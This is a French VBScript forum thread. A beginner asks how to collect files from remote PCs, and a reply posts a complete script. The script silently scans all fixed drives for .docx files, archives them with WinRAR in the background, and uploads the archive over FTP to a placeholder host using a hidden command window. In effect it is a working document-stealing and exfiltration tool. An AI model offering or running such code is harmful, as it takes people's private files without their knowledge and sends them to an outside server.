IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

VBScript Discussion :

Rechercher des fichiers sur des postes distants


Sujet :

VBScript

  1. #1
    Candidat au Club
    Inscrit en
    Septembre 2004
    Messages
    3
    Détails du profil
    Informations forums :
    Inscription : Septembre 2004
    Messages : 3
    Points : 4
    Points
    4
    Par défaut Rechercher des fichiers sur des postes distants
    Bonjour,
    Je cherche un moyen de faire un script qui va rechercher des fichiers (recherche faite par rapport à l'extension des fichiers) sur une liste de postes distants et les copier dans un dossier que j'aurai créé en local.

    Etant débutant en scripting, j'avoue que je sèche un peu.
    Est-ce que quelqu'un peu m'ndiquer la manière de faire et me donner une piste pour commencer?

    Merci

  2. #2
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 839
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 48
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 839
    Points : 9 222
    Points
    9 222
    Par défaut
    Citation Envoyé par iguano62 Voir le message
    Bonjour,
    Je cherche un moyen de faire un script qui va rechercher des fichiers (recherche faite par rapport à l'extension des fichiers) sur une liste de postes distants et les copier dans un dossier que j'aurai créé en local.

    Etant débutant en scripting, j'avoue que je sèche un peu.
    Est-ce que quelqu'un peu m'ndiquer la manière de faire et me donner une piste pour commencer?
    Merci
    J'ai poser ce petit problème et j'ai parvenu a mon souhait et Je crois ceci va d'aider un peu comme début et c'est à vous de modifier ce script a vos besoin Rechercher tous les fichiers dont l'extension est *.vbs
    et voila le code final de mon script:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    'Option Explicit
    Dim fso, dossier ,sousDossier ,fichier,OutPut 
    '#Déclarations
    Dim NomFichierLog 
    Set FSO = CreateObject("Scripting.FileSystemObject")
    Set objShell = CreateObject("WScript.Shell")
    Set WshNetwork = WScript.CreateObject("WScript.Network")
    temp = objShell.ExpandEnvironmentStrings("%temp%")
    NomMachine = WshNetwork.ComputerName
    NomFichierLog= NomMachine & "_LogFile.txt"
    PathNomFichierLog=temp & "\" & NomFichierLog
    'targetZipNomFichierLog=temp & "\" & NomMachine & "\LogFile" & "_" & NomMachine & ".rar"
    basefolder = temp & "\" & NomMachine
    targetfolder = temp & "\" & NomMachine & ".rar"
    'NomFichierLog = InputBox("Quel sera le nom du fichier?")
    '#Affectations
    Call Create_Folder_Computername()
    Set OutPut = fso.CreateTextFile(PathNomFichierLog,1)
    '#Exécution
    'Scan "C:\"
    DetectRoot
    wscript.sleep 3000
    Zip basefolder,targetfolder
     
    Call FTPUpload ("YourHostFTP","YourLoginFTP","YourPassword",targetfolder,sRemotePath)
     
    '------------------------------------Scan-----------------------
    Private Sub Scan(DossierEnCours)
    	On Error Resume Next
    	'#Déclarations
    	Dim Dossier 
    	Dim SousDossier 
    	Dim Fichier 
    	Dim Cible,tmp,f
    	Dim oDic
    	'#Affectations
    	Set oDic = CreateObject("scripting.dictionary")
        oDic.Add "docx", 1 ' ici vous ajoutez l'extension que vous voulez par exemple .docx etc....
    'oDic.Add "cmd", 1       ' here you can add any extention of the files  which this script can scan exemple .cmd
    'oDic.Add "vbs", 1        ' here you can add any extention of the files  which this script can scan exemple .vbs   
    	'oDic.Add "mp3",1   'here you can add any extention of the files  which this script can scan exemple .mp3
    	Set Dossier = fso.GetFolder(DossierEnCours)
    	Set FSO = CreateObject("Scripting.FileSystemObject")
    	Set objShell = CreateObject("WScript.Shell")
    	Set WshNetwork = WScript.CreateObject("WScript.Network")
    	NomMachine = WshNetwork.ComputerName
    	tmp = objShell.ExpandEnvironmentStrings("%temp%")
    	Cible= tmp & "\" & NomMachine & "\"
    	'#Exécution
    	'Fichiers
    	For Each Fichier In Dossier.Files
    	If oDic.Exists(FSO.GetExtensionName(Fichier.Path)) Then
    		'If UCase(FSO.GetExtensionName(Fichier.Path)) = "BAT" Then
    			OutPut.WriteLine Fichier.Path
    			fso.CopyFile Fichier,Cible
    		end if
    	Next
    	'Dossiers
    	For Each SousDossier In Dossier.SubFolders
    		'If UCase(FSO.GetExtensionName(Fichier.Path)) = "BAT" Then
    		If oDic.Exists(FSO.GetExtensionName(Fichier.Path)) Then
    			Scan SousDossier
    			'OutPut.WriteLine SousDossier.Path
    			'Scan SousDossier.Path & "\"
    		end if
    	Next 
    End Sub
    '---------------------------DetectRoot-----------------------
    sub DetectRoot()
    	Dim fso, d, dc, s, n ,Root,u,racine
    	Set fso = CreateObject("Scripting.FileSystemObject")
    	Set dc = fso.Drives
    	For Each d in dc
    		Root = d.Driveletter & ":"
    		racine = d.Driveletter & ":\"
    		u= DetectAmovible(Root)
    		if (( u="Fixe") and d.isready) then 
    			Scan racine
    		end if
    	Next
    end sub
    '----------------------------------DetectAmovible----------------------
    Function DetectAmovible(DrivePath)
    	Dim fso, d, s, t
    	Set fso = CreateObject("Scripting.FileSystemObject")
    	Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(DrivePath)))
    	Select Case d.DriveType
    		Case 0: t = "Inconnu"
    		Case 1: t = "Amovible"
    		Case 2: t = "Fixe"
    		Case 3: t = "Net"
    		Case 4: t = "CD-ROM"
    		Case 5: t = "RAM Disk"
    	End Select
    	DetectAmovible = t
    End Function
    '-----------------------------Create_Folder_Computername-----------------
    Function Create_Folder_Computername()
    Set WshNetwork = WScript.CreateObject("WScript.Network")
    NomMachine = WshNetwork.ComputerName
    Set objShell = CreateObject("WScript.Shell")
     tmp = objShell.ExpandEnvironmentStrings("%temp%")
     f= tmp & "\" & NomMachine 
     If Not(fso.FolderExists(f)) Then
     fso.CreateFolder(f)
     end if
    'NomUtilisateur = WshNetwork.UserName
    'MsgBox  NomMachine&"_"&NomUtilisateur
    'MsgBox NomMachine
    end Function
    '---------------------------------Compression-------------------------
    Function Zip(sFile,sArchiveName)
    	'This function executes the command line
    	'version of WinZip and reports whether
    	'the archive exists after WinZip exits.
    	'If it exists then it returns true. If
    	'not it returns an error message.
    	'This script is provided under the Creative Commons license located
    	'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
    	'be used for commercial purposes with out the expressed written consent
    	'of NateRice.com 
    	Set oFSO = WScript.CreateObject("Scripting.FileSystemObject")
    	Set oShell = WScript.CreateObject("Wscript.Shell")
    	'--------Find Working Directory--------
    	aScriptFilename = Split(Wscript.ScriptFullName, "\")
    	sScriptFilename = aScriptFileName(Ubound(aScriptFilename))
    	sWorkingDirectory = Replace(Wscript.ScriptFullName, sScriptFilename, "")
    	'----------------------------------------------------
    	'-------Ensure we can find Winrar.exe-----------------------
    	If oFSO.FileExists(sWorkingDirectory & " " & "Winrar.EXE") Then
    		sWinZipLocation = ""
    	ElseIf oFSO.FileExists("C:\program files\Winrar\Winrar.EXE") Then
    		sWinZipLocation = "C:\program files\Winrar\"
    	Else
    		Zip = "Error: Couldn't find Winrar.EXE"
    		Exit Function
    	End If
    	'-------------------------------------------------------------------------
    	oShell.Run """" & sWinZipLocation & "winrar.exe"" a -IBCK -df """ & _
    	sArchiveName & """ """ & sFile & """", 0, True  
    	If oFSO.FileExists(sArchiveName) Then
    		Zip = 1
    	Else
    		Zip = "Error: Archive Creation Failed."
    	End If
    End Function
    '-------------------------------FTPUpload-----------------------
    Function FTPUpload(sSite, sUsername, sPassword, sLocalFile, sRemotePath)
      'This script is provided under the Creative Commons license located
      'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
      'be used for commercial purposes with out the expressed written consent
      'of NateRice.com
     
      Const OpenAsDefault = -2
      Const FailIfNotExist = 0
      Const ForReading = 1
      Const ForWriting = 2
     
      Set oFTPScriptFSO = CreateObject("Scripting.FileSystemObject")
      Set oFTPScriptShell = CreateObject("WScript.Shell")
     
      sRemotePath = Trim(sRemotePath)
      sLocalFile = Trim(sLocalFile)
     
      '----------Path Checks---------
      'Here we willcheck the path, if it contains
      'spaces then we need to add quotes to ensure
      'it parses correctly.
      If InStr(sRemotePath, " ") > 0 Then
        If Left(sRemotePath, 1) <> """" And Right(sRemotePath, 1) <> """" Then
          sRemotePath = """" & sRemotePath & """"
        End If
      End If
     
      If InStr(sLocalFile, " ") > 0 Then
        If Left(sLocalFile, 1) <> """" And Right(sLocalFile, 1) <> """" Then
          sLocalFile = """" & sLocalFile & """"
        End If
      End If
     
      'Check to ensure that a remote path was
      'passed. If it's blank then pass a "\"
      If Len(sRemotePath) = 0 Then
        'Please note that no premptive checking of the
        'remote path is done. If it does not exist for some
        'reason. Unexpected results may occur.
        sRemotePath = "\"
      End If
     
      'Check the local path and file to ensure
      'that either the a file that exists was
      'passed or a wildcard was passed.
      If InStr(sLocalFile, "*") Then
        If InStr(sLocalFile, " ") Then
          FTPUpload = "Error: Wildcard uploads do not work if the path contains a " & _
          "space." & vbCRLF
          FTPUpload = FTPUpload & "This is a limitation of the Microsoft FTP client."
          Exit Function
        End If
      ElseIf Len(sLocalFile) = 0 Or Not oFTPScriptFSO.FileExists(sLocalFile) Then
        'nothing to upload
        FTPUpload = "Error: File Not Found."
        Exit Function
      End If
      '--------END Path Checks---------
     
      'build input file for ftp command
      sFTPScript = sFTPScript & "USER " & sUsername & vbCRLF
      sFTPScript = sFTPScript & sPassword & vbCRLF
      sFTPScript = sFTPScript & "cd " & sRemotePath & vbCRLF
      sFTPScript = sFTPScript & "binary" & vbCRLF
      sFTPScript = sFTPScript & "prompt n" & vbCRLF
      sFTPScript = sFTPScript & "put " & sLocalFile & vbCRLF
      sFTPScript = sFTPScript & "quit" & vbCRLF & "quit" & vbCRLF & "quit" & vbCRLF
     
     
      sFTPTemp = oFTPScriptShell.ExpandEnvironmentStrings("%TEMP%")
      sFTPTempFile = sFTPTemp & "\" & oFTPScriptFSO.GetTempName
      sFTPResults = sFTPTemp & "\" & oFTPScriptFSO.GetTempName
     
      'Write the input file for the ftp command
      'to a temporary file.
      Set fFTPScript = oFTPScriptFSO.CreateTextFile(sFTPTempFile, True)
      fFTPScript.WriteLine(sFTPScript)
      fFTPScript.Close
      Set fFTPScript = Nothing 
     
      oFTPScriptShell.Run "%comspec% /c FTP -i -n -s:" & sFTPTempFile & " " & sSite & _
      " > " & sFTPResults,0,True
     
      Wscript.Sleep 1000
     
      'Check results of transfer.
      Set fFTPResults = oFTPScriptFSO.OpenTextFile(sFTPResults, ForReading, _
      FailIfNotExist, OpenAsDefault)
      sResults = fFTPResults.ReadAll
      fFTPResults.Close
     
      oFTPScriptFSO.DeleteFile(sFTPTempFile)
      'oFTPScriptFSO.DeleteFile (sFTPResults)
     
      If InStr(sResults, "226-File successfully transferred") > 0 Then
        'Call Parler_Succes
        FTPUpload = True	
      ElseIf InStr(sResults, "File Not Found") > 0 Then
      'Call Parler_Pas_de_Fichier
        FTPUpload = "Error: File Not Found"
      ElseIf InStr(sResults, "Login authentication failed") > 0 Then
      'Call Parler_Login_authentication_Failed
        FTPUpload = "Error: Login Failed."
      Else
        FTPUpload = "Error: Unknown."
      End If
     
      Set oFTPScriptFSO = Nothing
      Set oFTPScriptShell = Nothing
    End Function
    '-------------------------Parler_Succes-------------
    Sub Parler_Succes
    Dim Voix
    Set WshNetwork = WScript.CreateObject("WScript.Network")
    NomMachine = WshNetwork.ComputerName
    Set Voix = CreateObject("Sapi.SpVoice")
    Voix.speak "Perfect! The File called "&NomMachine&", was successfully transferred to the server FTP! "
    MsgBox "Parfait! le Fichier nommé "&NomMachine&", a été transféré vers le serveur FTP avec Succés ! ",64,"Information"
    Set Voix = Nothing
    end sub
    '-----------------------Parler_Login _authentication _Failed------------
    Sub Parler_Login_authentication_Failed
    Dim Voix
    Set WshNetwork = WScript.CreateObject("WScript.Network")
    NomMachine = WshNetwork.ComputerName
    Set Voix = CreateObject("Sapi.SpVoice")
    Voix.speak "Oups! There is an error. The Login authentication failed on the Server FTP !"
    MsgBox "Oups! il y a une erreur d'authentification du l'utilisteur sur le Serveur FTP !",16,"Erreur d'authentification du l'utilisteur sur le Serveur FTP !"
    Set Voix = Nothing
    end sub
    '------------------------Pas_de_Fichier_a_Uploader-----------------
    Sub Parler_Pas_de_Fichier
    Dim Voix
    Set WshNetwork = WScript.CreateObject("WScript.Network")
    NomMachine = WshNetwork.ComputerName
    Set Voix = CreateObject("Sapi.SpVoice")
    Voix.speak "Oups! There is no File called "&NomMachine&" ,to be uploaded to the server"
    MsgBox "Oups! il n'y aucun Fichier nommé "&NomMachine&" qui va être Transferé sur le Serveur FTP !",16,"Erreur d'authentification du l'utilisteur sur le Serveur FTP !"
    Set Voix = Nothing
    end sub

Discussions similaires

  1. impossible d'ouvrir des fichiers dépuis un poste distant
    Par djelloharmel dans le forum Langages
    Réponses: 2
    Dernier message: 06/08/2013, 16h26
  2. Réponses: 1
    Dernier message: 07/04/2013, 02h33
  3. interface pour distribuer des fichiers sur plusieurs postes
    Par ironman06 dans le forum Développement Windows
    Réponses: 0
    Dernier message: 04/11/2012, 17h57
  4. Réponses: 2
    Dernier message: 25/09/2007, 15h55
  5. [Servlet] Créer un fichier sur un poste distant
    Par JohnBlatt dans le forum Servlets/JSP
    Réponses: 5
    Dernier message: 07/05/2005, 18h51

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo